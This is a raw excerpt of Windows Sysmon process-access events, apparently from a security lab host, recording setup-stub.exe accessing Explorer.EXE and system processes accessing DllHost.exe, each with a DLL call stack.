13:59:53.630{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-9459-6005-3105-00000000A301}6756C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016455Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.630{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-9459-6005-3105-00000000A301}6756C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.630{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9459-6005-3105-00000000A301}6756C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.630{59A5CD1D-8E46-6005-0C00-00000000A301}5964220C:\Windows\system32\svchost.exe{59A5CD1D-9459-6005-3105-00000000A301}6756C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000016450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000016446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000016444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000016442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64) 10341000x800000000000000016438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000016437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000016436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:53.583{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.